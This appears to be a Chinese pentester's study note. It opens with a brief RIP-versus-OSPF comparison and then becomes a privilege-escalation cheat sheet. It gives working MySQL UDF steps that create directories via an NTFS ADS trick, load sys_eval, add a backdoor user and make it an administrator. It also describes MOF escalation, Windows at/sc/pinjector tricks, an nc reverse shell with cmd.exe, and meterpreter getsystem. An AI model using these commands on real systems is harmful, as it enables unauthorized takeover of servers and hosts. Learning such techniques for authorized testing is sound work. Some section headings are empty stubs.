Rip和ospf的区别

都是路由协议,但ospf更强大的地方是,ospf对网络的拓扑结构了如指掌,一旦某条链路断了,就可以及时给出备份路线,对通信的影响小,rip其中的某一跳路由一旦断了,就无法继续进行通信了

Rip:数跳数来计算最佳路线;仅和邻居交换路由信息;固定时间发送路由信息;限制网络规模,最大不超过15,16表示不可达

Ospf:通过计算链路的度量值来分配最优路线;向本自治系统所有的路由器发送信息(路由表信息);只有当链路状态发生变化时,路由器才会向所有路由器采用防洪的方法发送此消息;为了减少防洪对网络的压力,每次防洪数据时,仅在更小的域之间进行广播防洪,比自治系统更小的范围叫做区域

Mysql提权

Udf提权

利用前提:

1、其利用条件是目标系统是Windows(Win2000,XP,Win2003);拥有MYSQL的某个用户账号,此账号必须有对mysql的insert和delete

权限以创建和抛弃函数,有root账号密码。

2、Mysql版本大于5.1版本udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。

3、Mysql版本小于5.1版本。udf.dll文件在Windows2003下放置于c:\windows\system32,在windows2000下放置于c:\winnt\

system32。

4、掌握的mysql数据库的账号有对mysql的insert和delete权限以创建和抛弃函数,一般以root账号为佳,具备`root账号所具备的权限

的其它账号也可以。

 

在sqlmap下的D:\渗透工具\python027\sqlmapproject-sqlmap-e910fc6\data\udf\mysql\windows\64/32下有现成的udf文件

 

Mysql<5.0时,导出路径随意

5.0<mysql<5.1时,则需要将udf文件导出到对应服务器的系统目录(c:/windows/system32)

Mysql>5.1时,必须要把udf文件放到mysql安装目录下的lib/plugin文件夹下才能创建自定义函数

一般lib/plugin文件夹需要手工建立

数据库中执行:

(1)select @@basedir;  //查找到mysql的目录

 

(2)select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib::$INDEX_ALLOCATION';    //利用NTFS ADS创建lib目录

 

select 'It is dll' into dumpfile 'C:\\Program Files\\MySQL\\MySQL Server 5.1\\lib\\plugin::$INDEX_ALLOCATION';    //利用NTFS ADS创建plugin目录

(3)从udf文件中引入自定义函数

​create function sys_eval returns string soname 'udf.dll'; //sys_eval​​​​是函数名称,​​​​udf.dll​​​​是​​lib_mysqludf_sys.dll_上传后的文件名

(4)执行自定义函数

新建账号wyy,密码为daniao

select sys_eval('net user wyy daniao /add');

 

(5)加入管理员组

Select sys_eval(‘net localgroup administrators wyy /add’)

Mof提权

Mof是windows的一个系统文件,位于C:\Windows\System32\wbem\MOF\mof.dll中,叫做托管对象格式,它的作用是每隔5s就会去监控进程的死亡和创建。Mof提权就是在拥有mysql的root权限,使用root权限去执行上传操作,将我们重新写过的mof文件上传,之后这个文件就会以每隔5s以system的权限运行。之所以可以提权,是因为该文件的加载过程是由system权限执行的,所以我们可以把权限最高提到system。

利用条件:

1.windows版本<=2003

2.C:\Windows\System32\wbem\MOF的目录可写入

3.数据库允许外连,且已知root账号密码

二次注入

堆叠注入

Windows提权

Useràadministratoràsystem

 

提权工具:

At:at+时间+/interactive cmd   -----提权到system

Schtasks(新版本的系统中遗弃了at命令,采用了Schtasks)

Sc:sc Create super binpath="cmd /K start" type=own type= interact 创建一个super的cmd进程

使用 sc start super 启动该super的cmd进程

Pinjector.exe -l 可以查看可以注入的进程

使用pinjector.exe -p 2222(可注入的进程号) cmd 2345(将cmd转发到2345端口)

然后再使用nc去监听2345端口返回的cmd

 nc -nv 192.168.23.131 2345

 

nc使用方法

靶  机:nc 192.168.23.129(监听机ip) 1234 -e cmd.exe

监听机:nc-lp 1234

常见cve(cve-2017-7344、cve-2018-8120、cve-2018-8897 )

使用msf进行漏洞利用,进入meterpreter后使用getsystem进行提权